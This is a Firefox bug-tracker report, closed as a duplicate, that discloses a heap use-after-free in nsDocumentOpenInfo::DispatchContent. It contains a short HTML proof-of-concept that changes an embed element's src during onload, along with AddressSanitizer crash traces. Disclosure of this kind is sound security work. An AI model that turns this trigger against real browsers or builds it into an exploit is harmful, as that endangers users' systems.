Closed
Bug 787777
Opened 12 years ago
Closed 12 years ago
use-after-free in nsDocumentOpenInfo::DispatchContent
Categories
(Core :: General, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 787778
People
(Reporter: miaubiz, Unassigned)
Details
(Whiteboard: [sg:dupe 787778])
Attachments
(1 file)
|
216 bytes,
text/plain
|
Details |
when I open this
<html>
<head>
<script>
window.onload = function() {
window.document.x.src='a'
}
</script>
</head>
<body>
<embed name="x" src="http://mozilla.org">
</embed>
</body>
</html>
I get this:
=================================================================
==24242== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffc5b03d98 at pc 0x7ffff0da8d98 bp 0x7fffffff9730 sp 0x7fffffff9728
READ of size 8 at 0x7fffc5b03d98 thread T0
#0 0x7ffff0da8d98 in nsCOMPtr_base::assign_assuming_AddRef(nsISupports*) /builds/slave/try-lnx64/build/xpcom/build/../glue/nsCOMPtr.h:436
#1 0x7ffff005516e in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /builds/slave/try-lnx64/build/uriloader/base/nsURILoader.cpp:375
#2 0x7ffff005487b in nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*) /builds/slave/try-lnx64/build/uriloader/base/nsURILoader.cpp:263
0x7fffc5b03d98 is located 24 bytes inside of 72-byte region [0x7fffc5b03d80,0x7fffc5b03dc8)
freed by thread T0 here:
#0 0x42ae21 in free ??:0
#1 0x7ffff0053f88 in nsAutoRefCnt::operator=(unsigned int) /builds/slave/try-lnx64/build/../../dist/include/mozilla/mozalloc.h:224
#2 0x7ffff0eaf825 in NS_InvokeByIndex_P /builds/slave/try-lnx64/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:165
works on linux + m-c, linux + aurora and osx + m-c atleast.
|
||
Updated•12 years ago
|
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → DUPLICATE
|
||
Updated•10 years ago
|
Group: core-security
Whiteboard: [sg:dupe 787778]
You need to log in
before you can comment on or make changes to this bug.
Description
•